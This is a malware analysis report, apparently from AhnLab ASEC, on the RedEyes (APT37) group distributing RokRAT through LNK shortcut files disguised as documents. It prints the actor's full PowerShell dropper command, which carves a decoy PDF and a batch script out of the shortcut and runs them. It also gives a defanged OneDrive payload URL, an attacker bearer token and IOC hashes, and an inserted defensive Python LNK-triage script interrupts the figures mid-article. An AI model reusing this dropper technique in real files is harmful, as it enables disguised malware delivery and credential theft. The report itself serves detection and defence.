# RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)

**asec.ahnlab.com/en/51751/**

By bghjmun, April 26, 2023

AhnLab Security Emergency response Center (ASEC) confirmed that the RedEyes threat group (also known as APT37, ScarCruft), which [distributed CHM malware disguised as a security email from a Korean financial company last month](https://asec.ahnlab.com/en/49089/), has also recently distributed the RokRAT malware through LNK files. RokRAT is malware capable of collecting user credentials and downloading additional malware. It was previously distributed through HWP and Word files.

The LNK files discovered this time contain PowerShell commands that carry out the malicious behavior by creating a script file, together with a normal decoy file, in the temp folder and executing both. The confirmed LNK filenames are as follows:

- 230407Infosheet.lnk
- April 29th 2023 Seminar.lnk
- 2023 Personal Evaluation.hwp.lnk
- NK Diplomat Dispatch Selection and Diplomatic Offices.lnk
- NK Diplomacy Policy Decision Process.lnk

The “230407Infosheet.lnk” file is disguised with a PDF icon and contains a malicious PowerShell command.

Figure 1. Properties of the LNK file

The LNK file contains not only the PowerShell command but also the data of a normal PDF file and the malicious script code. Furthermore, it is padded with dummy bytes from offset 0x89D9A all the way to 0x141702A.

Figure 2. Dummy data at the end of the LNK file

The PowerShell command that cmd.exe executes when the LNK file is opened is as follows:

```powershell
/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') { $dirPath = '%temp%' }; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00561396 -ReadCount 00561396; $pdfPath = '%temp%\230407정보지.pdf'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002474)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00564634 -ReadCount 00564634; $exePath = '%temp%\230412.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00561396)) -Encoding Byte; ^& $exePath;
```

The command first locates the LNK file by its exact size (0x14A0DC4 bytes). It then reads the first 0x890F4 (561396) bytes of the LNK file, skips the first 0x9AA (2474) bytes, and saves and opens the remainder as “230407Infosheet.pdf” in the Temp folder. Afterward, it reads the first 0x89D9A (564634) bytes, skips the first 0x890F4 bytes (which contain the PDF data), and saves and executes the remainder as “230412.bat” in the Temp folder.

Figure 3. PDF data located at 0x9AA of the LNK file

Figure 4. Script code located at 0x890F4 of the LNK file

Figure 5. Files created in the Temp folder

The threat actor opens a normal PDF file so that the behavior appears legitimate before carrying out the malicious behavior through the script file.

Figure 6. 230407Infosheet.pdf (normal file)

The script file executed at the same time contains the following PowerShell command, which executes malicious commands stored as HEX values.

Figure 7. 230412.bat

The final PowerShell command downloads encoded data from hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/, decodes it, and injects it into the PowerShell process to perform the malicious behavior.
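To triage a shortcut like this, a defender wants the opposite of what the actor's command does: find where the legitimate Shell Link structure ends and treat whatever follows as an overlay to be carved and examined. The Python below is an added example written for this write-up, not AhnLab's tooling; it walks the MS-SHLLINK header, LinkTargetIDList, LinkInfo, StringData and ExtraData to compute that boundary, pulls the embedded command line out of the Arguments field, and reports the overlay size and the offset of any `%PDF` header inside it. The shortcut it runs on is constructed in memory (a minimal header, one Arguments string with a placeholder command line, a fake PDF, a fake script and zero padding standing in for the dummy bytes); the offsets the real sample uses (0x9AA for the PDF, 0x890F4 for the script) come from the analysis above and are not produced by this fixture.

```python
"""Triage helper for .lnk files that carry appended payloads (added example).

Walks the Shell Link structures (header, LinkTargetIDList, LinkInfo,
StringData, ExtraData) to find where the legitimate shortcut ends, treats
everything after that point as an overlay, and reports its size, the offset
of any embedded PDF header, and the command line held in the Arguments field.
The sample shortcut is constructed in memory for demonstration.
"""
import struct

LNK_HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046} in its on-disk (little-endian) layout
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits, MS-SHLLINK section 2.1.1
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
IS_UNICODE = 0x80
# StringData fields in file order, with the LinkFlags bit that enables each
STRING_FIELDS = (("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40))


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields plus the offset where the LNK structures end."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a Shell Link header")
    if data[4:20] != LNK_CLSID:
        raise ValueError("unexpected LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    char_size, enc = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    for name, bit in STRING_FIELDS:                # CountCharacters (2 bytes) + chars, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            fields[name] = data[off:off + count * char_size].decode(enc, errors="replace")
            off += count * char_size
    while off + 4 <= len(data):                    # ExtraData blocks; BlockSize < 4 terminates
        block_size = struct.unpack_from("<I", data, off)[0]
        if block_size < 4:
            off += 4
            break
        off += block_size
    fields["structure_end"] = off
    return fields


def triage_lnk(data: bytes) -> dict:
    """Summarise what a defender wants to know: command line, overlay size, embedded PDF."""
    info = parse_lnk(data)
    end = info["structure_end"]
    overlay = data[end:]
    pdf = overlay.find(b"%PDF")
    return {
        "arguments": info.get("arguments", ""),
        "structure_end": end,
        "overlay_size": len(overlay),
        "pdf_offset": end + pdf if pdf >= 0 else None,
        "suspicious": len(overlay) > 0,             # a clean shortcut has nothing after the terminal block
    }


def build_sample_lnk(with_payload: bool = True) -> bytes:
    """Constructed fixture: a minimal Unicode shortcut whose Arguments field holds a
    placeholder command line, optionally followed by a fake PDF, a fake script and padding."""
    flags = 0x20 | IS_UNICODE                      # HasArguments | IsUnicode
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))   # attributes, timestamps etc. zeroed
    args = "/c powershell -windowstyle hidden <constructed placeholder>"
    string_data = struct.pack("<H", len(args)) + args.encode("utf-16-le")
    lnk = header + string_data + struct.pack("<I", 0)     # terminal ExtraData block
    if not with_payload:
        return lnk
    fake_pdf = b"%PDF-1.4\n% constructed decoy document\n%%EOF\n"
    fake_script = b"@echo off\r\nrem constructed placeholder script\r\n"
    return lnk + fake_pdf + fake_script + b"\x00" * 64    # zeros stand in for the dummy bytes


if __name__ == "__main__":
    for payload in (False, True):
        print(triage_lnk(build_sample_lnk(payload)))
```

On a real sample the same check is what makes a 21 MB shortcut stand out: the structure ends within the first few kilobytes, so almost the entire file is overlay, and the decoded Arguments string is the command line to review.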
Figure 8. Final PowerShell command that is executed

Figure 9. Malicious file uploaded to OneDrive

The injected data is the RokRAT malware, which is capable of collecting user credentials and downloading additional malware. The collected information is sent to the threat actor’s cloud server via cloud services such as pCloud and Yandex. The User-Agent in the request header is disguised as Googlebot. The authorization token used when uploading files is as follows:

`Authorization: Bearer RSbj7Zk5IYK5ThSbQZH4YBo7ZxiPOCH94RBbFuU9c04XXVJg7xbvX`

The additional normal files executed through the malicious LNK files are as follows:

Figure 10. April 29th 2023 Seminar.pdf created through April 29th 2023 Seminar.lnk

Figure 11. 230402.hwp created through NK Diplomacy Policy Decision Process.lnk

As RokRAT has been in distribution for a while and is being distributed in various forms such as Word files, users are advised to take extra caution.

- [Reddoor (RokRAT) Malware Analysis Report – May 9, 2022](https://atip.ahnlab.com/ti/contents/issue-report/malware-analysis?i=4b8712d0-31e8-46c1-b6d7-0e1b32f94b60)
- [Korean APT Attacks Using Ruby Script Analysis Report – Apr. 7, 2021](https://atip.ahnlab.com/ti/contents/issue-report/malware-analysis?i=255948d4-3b27-4227-ae9a-542aa2eea545)

[File Detection]

- Dropper/LNK.Agent (2023.04.08.00)
- Downloader/BAT.Agent (2023.04.08.00)

[IOC]

- 0f5eeb23d701a2b342fc15aa90d97ae0 (LNK)
- aa8ba9a029fa98b868be66b7d46e927b (LNK)
- 657fd7317ccde5a0e0c182a626951a9f (LNK)
- be32725e676d49eaa11ff51c61f18907 (LNK)
- 8fef5eb77e0a9ef2f97591d4d150a363 (bat)
- 461ce7d6c6062d1ae33895d1f44d98fb (bat)
- hxxps://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/